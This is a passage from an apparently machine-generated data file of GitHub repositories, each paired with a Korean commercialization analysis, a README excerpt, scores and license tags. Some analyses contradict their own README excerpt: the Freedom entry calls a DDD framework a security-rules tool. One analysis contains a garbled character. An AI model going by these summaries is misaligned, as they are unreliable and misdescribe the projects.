Status](https://github.com/lwindolf/liferea/actions/workflows/cb.yml/badge.svg)](https://github.com/lwindolf/liferea/actions/workflows/cb.yml)\n\n## Installation from Package\n\nMany distributions have packaged Liferea:\n\n[![Packages](https://repology.org/badge/latest-versions/liferea.svg)](https://repology.org/metapackage/liferea/versions)\n[![Packages](https://repology.org/badge/tiny-repos/liferea.svg)](https://repology.org/metapackage/liferea/versions)\n\n\n## Building\n\nCompile with\n\n    meson setup builddir && cd builddir\n    meson compile\n    meson test\n\nUpdate translations\n\n    meson compile liferea-update-po\n\nInstall\n\n    meson install\n\nIf ","composite_score":0.0888,"license_safety_tag":"restricted"},{"name":"herrbischoff/awesome-osx-command-line","github_url":"https://github.com/herrbischoff/awesome-osx-command-line","stars":8,"language":"","license":"unknown","abandonment_months":3,"description":"# awesome-osx-command-line 평가\n\n## 왜 보물인가\n맥 컴퓨터 사용자들이 일상적으로 필요한 유용한 명령어와 도구들을 한곳에 모아놓은 참고서로, 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자/디자이너 대상 온라인 교육 플랫폼으로 \"맥 사용자를 위한 업무 단축키 강좌\" 구독 서비스\n","readme_excerpt":"# Awesome macOS Command Line / Awesome Command-Line Apps\n\nDue to personal changes, GitHub changes, a desire of not wanting to continue to \ndeal with mostly very low-effort contributions, entitled behavior and low \nquality, I've permanently moved these projects to my personal Git instance, \nwhere they will live from now on.\n\n- <https://herrbischoff.com/code/me/awesome-macos-command-line>\n- <https://herrbischoff.com/code/me/awesome-command-line-apps>\n\nThis is not least because of a substantially lacking readiness to donate even a \nsingle dollar — despite hundreds of daily visitors and almost 30k combined \nstars. Instead, these repositories are being linked to from large corporate \nintranets as a free source of knowledge, at times even from inside Apple. There \nhave been two notable exceptions over the last six years: one donation to the \nNGO of a dear friend and a single GitHub sponsor for a couple of months. 100% \nwere forwarded to the NGO as well. My thanks go out to you, you know who ","composite_score":0.0884,"license_safety_tag":"unknown"},{"name":"morelinq/MoreLINQ","github_url":"https://github.com/morelinq/MoreLINQ","stars":6,"language":"C#","license":"apache-2.0","abandonment_months":6,"description":"# MoreLINQ 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 처리 작업을 간단하게 만들어주는 도구 모음으로, 프로그래머들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 고객 정보나 판매 데이터를 빠르게 정렬하고 분석하는 웹 서비스\n2. **회계/재무 내부 도구**: 수천 개의 거래 기록을 효율적으로 ","readme_excerpt":"# MoreLINQ\n\nLINQ to Objects is missing a few desirable features.\n\nThis project enhances LINQ to Objects with extra methods, in a manner which\nkeeps to the spirit of LINQ.\n\nMoreLINQ is available for download and installation as\n[NuGet packages](https://www.nuget.org/packages/morelinq/).\n\nDocumentation for the stable and beta releases can be found at\n[morelinq.github.io](https://morelinq.github.io/).\n\n\n## Usage\n\nMoreLINQ can be used in one of two ways. The simplest is to just import the\n`MoreLinq` namespace and all extension methods become instantly available for\nyou to use on the types they extend (typically some instantiation of\n`IEnumerable<T>`). In some very rare instances, however, doing so can cause\nconflicts with other libraries you may be using that incidentally also extend\nthe same type with an identically named method and signature. This happened\nwith MoreLINQ, for example, when Microsoft .NET Framework 4.0 introduced\n[`Zip`][netzip] and [MoreLINQ already had one][zip]. Startin","composite_score":0.0884,"license_safety_tag":"safe"},{"name":"jasync-sql/jasync-sql","github_url":"https://github.com/jasync-sql/jasync-sql","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":4,"description":"# jasync-sql 저장소 분석\n\n## 왜 보물인가\n데이터베이스와 빠르게 통신하는 기술로, 웹 서비스가 사용자 요청에 더 빠르게 응답할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 수천 명의 사용자가 동시에 접속하는 웹 애플리케이션(예: 협업 도구, CRM)에서 데이터 조회 속도 개선\n2. **내부 업무 도구**: 기업의","readme_excerpt":"\n\n[![Chat at https://gitter.im/jasync-sql/support](https://badges.gitter.im//jasync-sql/support.svg)](https://gitter.im/jasync-sql/support) [![Maven Central](https://img.shields.io/maven-central/v/com.github.jasync-sql/jasync-common.svg?label=Maven%20Central)](https://search.maven.org/search?q=g:%22com.github.jasync-sql%22%20AND%20a:%22jasync-common%22) ![Build Status](https://github.com/jasync-sql/jasync-sql/actions/workflows/ci.yml/badge.svg?branch=master) [![Apache License V.2](https://img.shields.io/badge/license-Apache%20V.2-blue.svg)](https://github.com/jasync-sql/jasync-sql/blob/master/LICENSE) [![codecov](https://codecov.io/gh/jasync-sql/jasync-sql/branch/master/graph/badge.svg)](https://codecov.io/gh/jasync-sql/jasync-sql) [![Awesome Kotlin Badge](https://kotlin.link/awesome-kotlin.svg)](https://github.com/KotlinBy/awesome-kotlin#libraries-frameworks-database)\n\n[jasync-sql](https://github.com/jasync-sql/jasync-sql) is a Simple, Netty based, asynchronous, performant and reliabl","composite_score":0.0884,"license_safety_tag":"safe"},{"name":"n0shake/Public-APIs","github_url":"https://github.com/n0shake/Public-APIs","stars":13,"language":"","license":"unknown","abandonment_months":1,"description":"# Public-APIs 저장소 분석\n\n## 왜 보물인가\n다양한 웹 서비스들의 데이터에 쉽게 접근할 수 있는 API 목록 모음으로, 개발자들이 새로운 서비스를 빠르게 만들 수 있는 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여행 정보, 날씨, 뉴스 등을 한곳에 모아주는 대시보드 웹사이트\n2. **내부 업무 도구**: 회사가 ","readme_excerpt":"# Public-APIs [![Twitter: @abgbm](https://img.shields.io/badge/contact-@n0shake-blue.svg?style=flat)](https://twitter.com/n0shake) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n\nThis is an attempt to categorise different APIs scoured from the web which make their resources available for consumption.\n\n> Items marked with ![Open Source](https://raw.githubusercontent.com/abhishekbanthia/Public-APIs/master/opensource.png \"Open Source\") are open-source\n>\n> Items marked with 💸 are trial based APIs\n\n## Table of Contents\n\n- [Advertising](#advertising)\n- [Analytics](#analytics)\n- [Augmented Reality](#augmented-reality)\n- [Bar Code](#barcode)\n- [Big Data and Analytics](#big-data-and-analytics)\n- [Cryptocurrency](#cryptocurrencycrypto-wallets)\n- [Calendar](#calendar)\n- [Captcha](#captcha)\n- [Check In](#check-in)\n- [Commerce](#commerce)\n- [Communication](#communication)\n- [Content](#content)\n- [Currency](#currency)\n- [Desi","composite_score":0.0882,"license_safety_tag":"unknown"},{"name":"Lafree317/Unity-InterviewQuestion","github_url":"https://github.com/Lafree317/Unity-InterviewQuestion","stars":18,"language":"","license":"unknown","abandonment_months":4,"description":"# Unity-InterviewQuestion 분석\n\n## 왜 보물인가\n게임 개발자들이 취업 면접을 준비할 때 필요한 실무 질문과 답변을 한곳에 모아놓은 학습 자료이기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: 게임 개발 취업준비생을 위한 구독형 면접 코칭 서비스로 월별 업데이트되는 최신 질문 제공\n2. **기업 ","readme_excerpt":"# Unity 面试题总结\n\n持续整理真实面试经历与优质分享，欢迎长期 PR 贡献。\n\n## 目录\n- [语言](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E8%AF%AD%E8%A8%80.md)\n- [Unity](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/UnityEngine.md)\n- [设计模式](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F.md)\n- [算法](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E7%AE%97%E6%B3%95.md)\n- [图形学](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E5%9B%BE%E5%BD%A2%E5%AD%A6.md)\n- [网络](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E7%BD%91%E7%BB%9C.md)\n- [优化](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E4%BC%98%E5%8C%96.md)\n- [框架](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E6%A1%86%E6%9E%B6.md)\n- [工程实践 / CI](https://github.com/Lafree317/Unity-InterviewQuestion/blob/master/%E5%B7%A5%E7%A8%8B%E5%AE%9E%E8%B7%B5.md)\n- [测试与质量](https://github.com/Lafree317/Unity","composite_score":0.0882,"license_safety_tag":"unknown"},{"name":"bitpay/bitcore","github_url":"https://github.com/bitpay/bitcore","stars":8,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Bitcore 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래와 지갑 관리를 위한 핵심 기술을 제공하여, 블록체인 기반 금융 서비스를 만들려는 누구나 필요로 하는 기반 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 SaaS**: 개인 투자자나 소규모 거래소가 자신만의 플랫폼을 구축할 때 필요한 거래 엔진으로 제공\n2. **기업용 지갑","readme_excerpt":"# Bitcore Monorepo\n\n  <p align=\"center\">\n  <img alt=\"npm\" src=\"https://img.shields.io/npm/v/bitcore-lib\">\n  <img alt=\"GitHub commit activity\" src=\"https://img.shields.io/github/commit-activity/m/bitpay/bitcore\">\n  <a href=\"https://opensource.org/licenses/MIT/\" target=\"_blank\"><img alt=\"MIT License\" src=\"https://img.shields.io/badge/License-MIT-blue.svg\" style=\"display: inherit;\"/></a>\n  <a href=\"https://github.com/bitpay/bitcore/graphs/contributors\"> \n    <img alt=\"GitHub contributors\" src=\"https://img.shields.io/github/contributors/bitpay/bitcore\">\n  </a>\n  <br>\n <img src=\"https://circleci.com/gh/bitpay/bitcore.svg?style=shield\" alt=\"master build\">\n</p>\n  \n**Infrastructure to build Bitcoin and blockchain-based applications for the next generation of financial technology.**\n\n## Applications\n\n- [Bitcore Node](packages/bitcore-node) - A standardized API to interact with multiple blockchain networks\n- [Bitcore Wallet Client](packages/bitcore-wallet-client) - A client for Bitcore Wallet Se","composite_score":0.0876,"license_safety_tag":"safe"},{"name":"albinotonnina/albinotonnina.com","github_url":"https://github.com/albinotonnina/albinotonnina.com","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":4,"description":"# albinotonnina.com 저장소 분석\n\n## 왜 보물인가\n개인 포트폴리오 또는 개인 브랜드 웹사이트로, 창작자나 프리랜서가 자신의 작업물을 세상에 효과적으로 보여줄 수 있는 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 포트폴리오 자동 생성 플랫폼 - 사용자가 작업물을 입력하면 자동으로 예쁜 웹사이트가 만들어지는 서비스","readme_excerpt":"# albinotonnina.com\n\n[![License: CC BY-NC-ND 4.0](https://img.shields.io/badge/License-CC%20BY--NC--ND%204.0-lightgrey.svg)](https://creativecommons.org/licenses/by-nc-nd/4.0/)\n\n> Interactive portfolio website showcasing creative web development and animation techniques\n\n**Live Site:** [www.albinotonnina.com](http://www.albinotonnina.com)\n\n## ✨ Features\n\n- **Interactive SVG Animations** - Complex scene transitions with scroll-based animations\n- **Responsive Design** - Optimized for desktop and mobile viewing\n- **Performance Optimized** - Webpack 5 with code splitting and asset optimization\n- **Modern React** - Built with React 18 and modern JavaScript\n- **Custom Animation Engine** - Scroll-triggered animations with D3 interpolation\n- **Advanced SVG Rendering** - Preserved gradient definitions and complex illustrations\n\n## 📜 License\n\nThis portfolio is licensed under CC BY-NC-ND 4.0. You are welcome to view, run, and experiment with the code locally for learning purposes. However, you ma","composite_score":0.0874,"license_safety_tag":"unknown"},{"name":"amitshekhariitbhu/RxJava2-Android-Samples","github_url":"https://github.com/amitshekhariitbhu/RxJava2-Android-Samples","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":4,"description":"# RxJava2-Android-Samples 평가 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 데이터 처리를 간단하게 할 수 있도록 돕는 실전 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 개발자를 위한 온라인 학습 플랫폼에서 실습 강좌로 제공\n2. **내부 업무 도구**: 모바일 앱 개발팀의 코드 리뷰","readme_excerpt":"<img src=https://raw.githubusercontent.com/amitshekhariitbhu/RxJava2-Android-Samples/master/assets/rxjava2.png >\n\n# Learning RxJava 2 for Android by example\n\n### This project is for : \n* who is migrating to RxJava 2 \n* or just started with RxJava.\n\n## About me\n\nHi, I am Amit Shekhar, Founder @ [Outcome School](https://outcomeschool.com) • IIT 2010-14 • I have taught and mentored many developers, and their efforts landed them high-paying tech jobs, helped many tech companies in solving their unique problems, and created many open-source libraries being used by top companies. I am passionate about sharing knowledge through open-source, blogs, and videos.\n\n### Follow Amit Shekhar\n\n- [X/Twitter](https://twitter.com/amitiitbhu)\n- [LinkedIn](https://www.linkedin.com/in/amit-shekhar-iitbhu)\n- [GitHub](https://github.com/amitshekhariitbhu)\n\n### Follow Outcome School\n\n- [YouTube](https://youtube.com/@OutcomeSchool)\n- [X/Twitter](https://x.com/outcome_school)\n- [LinkedIn](https://www.linkedin.co","composite_score":0.0873,"license_safety_tag":"safe"},{"name":"centrifugal/centrifuge","github_url":"https://github.com/centrifugal/centrifuge","stars":5,"language":"Go","license":"MIT","abandonment_months":0,"description":"# Centrifuge 저장소 분석\n\n## 왜 보물인가\n실시간으로 대량의 사용자와 메시지를 동시에 처리해야 하는 서비스(채팅, 알림, 게임 등)를 만들 때 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 실시간 협업 도구**\n- 구글 닥스처럼 여러 명이 동시에 문서를 수정할 때, 변경 사항을 모두에게 즉시 전달하는 기술로 활","readme_excerpt":"[![Join the chat at https://t.me/joinchat/ABFVWBE0AhkyyhREoaboXQ](https://img.shields.io/badge/Telegram-Group-blue.svg)](https://t.me/joinchat/ABFVWBE0AhkyyhREoaboXQ)\n[![codecov.io](https://codecov.io/gh/centrifugal/centrifuge/branch/master/graphs/badge.svg)](https://codecov.io/github/centrifugal/centrifuge?branch=master)\n[![GoDoc](https://pkg.go.dev/badge/centrifugal/centrifuge)](https://pkg.go.dev/github.com/centrifugal/centrifuge)\n\n**This library has no v1 release, API may change.** Before v1 release patch version updates only have backwards compatible changes and fixes, minor version updates can have backwards-incompatible API changes. Master branch can have unreleased code. Only two last Go minor versions are officially supported by this library.\n\nThe Centrifuge library is a general purpose real-time messaging library for Go programming language. Real-time messaging can help create interactive applications where events are delivered to online users with milliseconds delay. Chats a","composite_score":0.0869,"license_safety_tag":"safe"},{"name":"slatedocs/slate","github_url":"https://github.com/slatedocs/slate","stars":8,"language":"","license":"unknown","abandonment_months":4,"description":"# Slate 저장소 분석\n\n## 왜 보물인가\n웹사이트에 API 사용 설명서를 깔끔하게 만들어주는 오픈소스 도구로, 기술 문서 작성의 번거로움을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 자신의 소프트웨어 서비스를 다른 회사에 판매할 때 사용 매뉴얼 페이지 자동 생성\n- **내부 업무 도구**: IT팀이 회사 직원들을 ","readme_excerpt":"Slate was a API documentation generator created by @lord in 2013. It was once used to host API docs for projects at NASA, Sony, Best Buy, Clearbit, Dwolla, Parrot Drones, WooCommerce, and Axidraw, among many others.\n\nAs the original creator and administrator of this project, and in the spirit of the various protests and strikes actively going on in the US (as of Jan 2026) I've decided to take it off of GitHub in protest of Microsoft's contracts with ICE and the IDF. You can read more about this decision on [my blog](https://lord.io/leaving-github/). My website also hosts [a read-only archive](https://code.lord.io/slate/) of Slate's code.\n","composite_score":0.0869,"license_safety_tag":"unknown"},{"name":"8treenet/freedom","github_url":"https://github.com/8treenet/freedom","stars":30,"language":"Go","license":"Apache-2.0","abandonment_months":4,"description":"# Freedom 저장소 분석\n\n## 왜 보물인가\nFreedom은 복잡한 보안 규칙을 간단하게 관리할 수 있는 도구로, 기업들이 데이터 접근 권한을 안전하고 효율적으로 통제할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 직원마다 다른 데이터에만 접근하도록 제한하는 협업 플랫폼\n2. **내부 업무 도구**: 부서별로 필요한 정","readme_excerpt":"# Freedom DDD 框架\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/8treenet/freedom/blob/master/LICENSE) [![Go Report Card](https://goreportcard.com/badge/github.com/8treenet/freedom)](https://goreportcard.com/report/github.com/8treenet/freedom)[![GoDoc](https://godoc.org/github.com/8treenet/freedom?status.svg)](https://godoc.org/github.com/8treenet/freedom)\n[![GitHub release](https://img.shields.io/github/v/release/8treenet/freedom.svg)](https://github.com/8treenet/freedom/releases)\n<img align=\"right\" width=\"200px\" src=\"https://raw.githubusercontent.com/8treenet/blog/master/img/freedom.png\">\n## 简介\n\nFreedom 是一个基于六边形架构（Hexagonal Architecture）的 Go 语言框架，专注于支持领域驱动设计（DDD）开发范式。本框架提供了完整的基础设施和工具链，帮助开发者构建可维护、可扩展的企业级应用。\n\n## 核心特性\n\n### 架构支持\n- 完整实现六边形架构（端口和适配器模式）\n- 领域驱动设计（DDD）最佳实践支持\n- 依赖注入（DI）和依赖倒置原则（DIP）\n- 完全符合开闭原则的插件化设计\n\n### 框架集成\n- 无缝集成 Iris Web 框架\n- 支持 HTTP/H2C 服务端和客户端\n- 内置 Prometheus 监控集成\n- 支持 AOP（面向切面编程）\n- 基于 Worker 的无侵入 Context 设计\n\n### 领域模型支持\n- 聚合根（A","composite_score":0.0867,"license_safety_tag":"safe"},{"name":"SuperNG6/MSI-b360-10.14.1-EFI","github_url":"https://github.com/SuperNG6/MSI-b360-10.14.1-EFI","stars":9,"language":"","license":"unknown","abandonment_months":7,"description":"# SuperNG6/MSI-b360-10.14.1-EFI 분석 보고서\n\n## 왜 보물인가\n특정 컴퓨터 부품 조합에서 macOS(애플 운영체제)를 실행할 수 있게 해주는 희귀한 설정 파일로, 기술 애호가들 사이에서 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **해킹 커뮤니티 정보 판매**: 같은 부품 조합을 쓰는 사용자들에게 설정 가이드나 상담 ","readme_excerpt":"\n## Requires macOS 10.14+. Works with Catalina and Big Sur. It's Free and Open Source.  \n\n![GitHub release](https://img.shields.io/github/v/release/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub release date](https://img.shields.io/github/release-date/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub last commit](https://img.shields.io/github/last-commit/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub download latest](https://img.shields.io/github/downloads/superng6/MSI-B360-Big-Sur-EFI/latest/total?style=flat-square)\n![GitHub download total](https://img.shields.io/github/downloads/superng6/MSI-B360-Big-Sur-EFI/total?style=flat-square)  \n![GitHub stars](https://img.shields.io/github/stars/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub forks](https://img.shields.io/github/forks/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub issues](https://img.shields.io/github/issues/superng6/MSI-B360-Big-Sur-EFI?style=flat-square)\n![GitHub issues clos","composite_score":0.0863,"license_safety_tag":"unknown"},{"name":"Cyb3rWard0g/ThreatHunter-Playbook","github_url":"https://github.com/Cyb3rWard0g/ThreatHunter-Playbook","stars":19,"language":"Python","license":"gpl-3.0","abandonment_months":4,"description":"# ThreatHunter-Playbook 상용화 분석\n\n## 왜 보물인가\n컴퓨터 침해 사건을 전문가처럼 조사할 수 있는 구체적인 실행 매뉴얼을 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 SaaS 플랫폼**: 중소기업용 사이버 침해 자동 탐지 및 대응 클라우드 서비스로 패키징\n2. **내부 보안팀 운영 도구**: 은행","readme_excerpt":"# The Threat Hunter Playbook\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/OTRF/ThreatHunter-Playbook/master)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![Twitter](https://img.shields.io/twitter/follow/HunterPlaybook.svg?style=social&label=Follow)](https://twitter.com/HunterPlaybook)\n[![Open_Threat_Research Community](https://img.shields.io/badge/Open_Threat_Research-Community-brightgreen.svg)](https://twitter.com/OTR_Community)\n[![Open Source Love](https://badges.frapsoft.com/os/v3/open-source.svg?v=103)](https://github.com/ellerbrock/open-source-badges/)\n\n<img src=\"docs/images/logo/logo.png\" width=200>\n\nThe Threat Hunter Playbook is a community-driven, open source project focused on **documenting how threat hunters think, plan, and reason** before, during, and after a hunt. The project captures adversary tradecraft, detection logic, and supporting resources in a structured way to make thr","composite_score":0.0862,"license_safety_tag":"restricted"},{"name":"microsoft/tsyringe","github_url":"https://github.com/microsoft/tsyringe","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# Microsoft Tsyringe 분석 보고서\n\n## 왜 보물인가\n소프트웨어를 만들 때 필요한 부품들을 자동으로 준비해주는 도구로, 개발자의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자별로 다른 설정을 자동으로 관리하는 구독형 웹 애플리케이션\n2. **내부 업무 도구**: 회사 직원들이 사용하는 ER","readme_excerpt":"[![Travis](https://img.shields.io/travis/Microsoft/tsyringe.svg)](https://travis-ci.org/Microsoft/tsyringe/)\n[![npm](https://img.shields.io/npm/v/tsyringe.svg)](https://www.npmjs.com/package/tsyringe)\n[![npm](https://img.shields.io/npm/dt/tsyringe.svg)](https://www.npmjs.com/package/tsyringe)\n\n# TSyringe\n\nA lightweight dependency injection container for TypeScript/JavaScript for\nconstructor injection.\n\n<!-- TOC depthFrom:1 depthTo:3 -->\n\n- [TSyringe](#tsyringe)\n  - [Installation](#installation)\n- [API](#api)\n  - [Decorators](#decorators)\n    - [injectable()](#injectable)\n    - [singleton()](#singleton)\n    - [autoInjectable()](#autoinjectable)\n    - [inject()](#inject)\n    - [injectAll()](#injectall)\n    - [injectWithTransform()](#injectWithTransform)\n    - [injectAllWithTransform()](#injectAllWithTransform)\n    - [scoped()](#scoped)\n  - [Container](#container)\n    - [Injection Token](#injection-token)\n    - [Providers](#providers)\n    - [Register](#register)\n    - [Registry](#registry","composite_score":0.0861,"license_safety_tag":"safe"},{"name":"theapache64/stackzy","github_url":"https://github.com/theapache64/stackzy","stars":21,"language":"Kotlin","license":"Apache-2.0","abandonment_months":4,"description":"# Stackzy 분석 보고서\n\n## 왜 보물인가\n개발자들이 앱을 만들 때 필요한 라이브러리(부품)들을 한눈에 확인하고 관리할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발사 내부 도구**: 회사의 여러 앱 프로젝트에서 어떤 부품들을 쓰고 있는지 중앙에서 관리하는 시스템으로 판매\n2. **개발 회사 컨설팅 서비스**: 기존 앱의 ","readme_excerpt":"# 🚀 stackzy\n\n![](https://i.imgur.com/wxn30fq.png)\n\n[comment]: <> (![latestVersion]&#40;https://img.shields.io/github/v/release/theapache64/stackzy&#41;)\n<a href=\"https://twitter.com/theapache64\" target=\"_blank\">\n<img alt=\"Twitter: theapache64\" src=\"https://img.shields.io/twitter/follow/theapache64.svg?style=social\" />\n</a>\n\n> A desktop app to analyse APK. Built using Compose desktop\n\n### ✨ Demo\n\n- [Watch](https://www.youtube.com/watch?v=XtM-sRLxLLc&ab_channel=theapache64) demo\n\n### 📽️ Usage\n\n- [Show](docs/USAGE.md) usage\n\n## 💻 Install\n\n| Platform     | Format | Download                                                                                                                                                      | Status       |\n|--------------|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|\n| **Linux**    | DEB    | [![Download Button](https://im","composite_score":0.0861,"license_safety_tag":"safe"},{"name":"timberio/vector","github_url":"https://github.com/timberio/vector","stars":8,"language":"Rust","license":"MPL-2.0","abandonment_months":0,"description":"# Vector 저장소 분석 보고서\n\n## 왜 보물인가\n기업의 모든 로그와 데이터를 한 곳으로 모아서 분석할 수 있는 통합 수집 도구로, 데이터 관리에 어려움을 겪는 회사들이 꼭 필요로 하는 솔루션입니다.\n\n## 어디에 �sal 수 있나\n1. **SaaS 서비스**: 로그 분석 플랫폼(Datadog, New Relic 경쟁사)으로 월 정액 구독형 제공\n2.","readme_excerpt":"[![Nightly](https://github.com/vectordotdev/vector/actions/workflows/nightly.yml/badge.svg)](https://github.com/vectordotdev/vector/actions/workflows/nightly.yml)\n[![Integration/E2E Test Suite](https://github.com/vectordotdev/vector/actions/workflows/integration.yml/badge.svg)](https://github.com/vectordotdev/vector/actions/workflows/integration.yml/badge.svg?event=merge_group)\n[![Component Features](https://github.com/vectordotdev/vector/actions/workflows/component_features.yml/badge.svg)](https://github.com/vectordotdev/vector/actions/workflows/component_features.yml)\n\n<p align=\"center\">\n  <img src=\"website/static/img/diagram.svg\" alt=\"Vector\">\n</p>\n\n<p align=\"center\">\n  <strong>\n    <a href=\"https://vector.dev/docs/setup/quickstart/\">Quickstart</a>&nbsp;&nbsp;&bull;&nbsp;&nbsp;\n    <a href=\"https://vector.dev/docs/\">Docs</a>&nbsp;&nbsp;&bull;&nbsp;&nbsp;\n    <a href=\"https://vector.dev/guides/\">Guides</a>&nbsp;&nbsp;&bull;&nbsp;&nbsp;\n    <a href=\"https://vector.dev/components/\">Int","composite_score":0.086,"license_safety_tag":"unknown"},{"name":"SeanPrashad/leetcode-patterns","github_url":"https://github.com/SeanPrashad/leetcode-patterns","stars":8,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# SeanPrashad/leetcode-patterns 분석\n\n## 왜 보물인가\n프로그래밍 면접에서 자주 나오는 문제들의 풀이 패턴을 체계적으로 정리한 학습 자료로, 취업을 준비하는 사람들의 필수 참고서입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 면접 준비 과정의 핵심 강좌로 패턴 설명과 함께 판매\n2. **기업 채용 담당자","readme_excerpt":"<p align=\"center\">\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"public/images/logo-dark.png\" />\n    <source media=\"(prefers-color-scheme: light)\" srcset=\"public/images/logo-light.png\" />\n    <img alt=\"Leetcode Patterns\" src=\"public/images/logo-light.png\" width=\"500\" />\n  </picture>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/seanprashad/leetcode-patterns/actions/workflows/deploy.yml\"><img src=\"https://github.com/seanprashad/leetcode-patterns/actions/workflows/deploy.yml/badge.svg\" alt=\"Deploy to GitHub Pages\" /></a>\n  <a href=\"https://github.com/seanprashad/leetcode-patterns/actions/workflows/update-questions.yml\"><img src=\"https://github.com/seanprashad/leetcode-patterns/actions/workflows/update-questions.yml/badge.svg\" alt=\"Update Questions\" /></a>\n</p>\n\n## Table of Contents\n\n- [Background](#background)\n- [Fundamentals](#fundamentals)\n- [Notes](#notes)\n- [Question List](#question-list)\n- [Solutions](#solutions)\n- [Contributing](#contributing)\n- [Sug","composite_score":0.0859,"license_safety_tag":"unknown"},{"name":"formium/tsdx","github_url":"https://github.com/formium/tsdx","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# formium/tsdx 프로젝트 분석\n\n## 왜 보물인가\nTypeScript로 만든 라이브러리를 쉽게 배포할 수 있게 도와주는 도구로, 개발자들이 복잡한 설정 없이 자신의 코드를 세상에 공개할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스의 개발 자동화 도구**\n회사의 개발팀이 반복적인 설정 작업을 줄이고 더 빠르게 새로운 기능을 ","readme_excerpt":"# TSDX\n\nZero-config CLI for TypeScript package development.\n\n[![CI](https://github.com/jaredpalmer/tsdx/actions/workflows/nodejs.yml/badge.svg)](https://github.com/jaredpalmer/tsdx/actions/workflows/nodejs.yml)\n[![npm](https://img.shields.io/npm/v/tsdx.svg)](https://www.npmjs.com/package/tsdx)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n\nModern TypeScript library development, simplified. TSDX provides a zero-config CLI that helps you develop, test, and publish TypeScript packages with ease.\n\n> **TSDX 2.0** is a complete rewrite using modern, high-performance Rust-based tooling. See the [Migration Guide](./MIGRATION.md) if upgrading from v0.x\n\n## Features\n\n- **Zero config** - Sensible defaults, just start coding\n- **Modern tooling** - Built on [bunchee](https://github.com/huozhi/bunchee), [vitest](https://vitest.dev/), [oxlint](https://oxc.rs/docs/guide/usage/linter.html), and [oxfmt](https://oxc.rs/docs/guide/usage/formatter","composite_score":0.0859,"license_safety_tag":"safe"},{"name":"chubin/awesome-console-services","github_url":"https://github.com/chubin/awesome-console-services","stars":5,"language":"","license":"mit","abandonment_months":4,"description":"# chubin/awesome-console-services 상품화 분석\n\n## 왜 보물인가\n터미널(검은 화면)에서 바로 사용할 수 있는 유용한 온라인 서비스들을 모아놓은 자료로, 개발자의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS**: 터미널 기반 개발 도구 검색·추천 플랫폼을 구독 서비스로 운영\n2. **","readme_excerpt":"# awesome-console-services\n\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA curated list of awesome console services (reachable via HTTP, HTTPS and other network protocols).\nStructured data of the list (kept in sync) is in [structured.yaml](structured.yaml).\n\n  - [IP Address](#IP-Address \"IP Address\")\n  - [Geolocation](#Geolocation \"Geolocation\")\n  - [Text Sharing](#Text-Sharing \"Text Sharing\")\n  - [URL Shortener](#URL-Shortener \"URL Shortener\")\n  - [File Transfer](#File-Transfer \"File Transfer\")\n  - 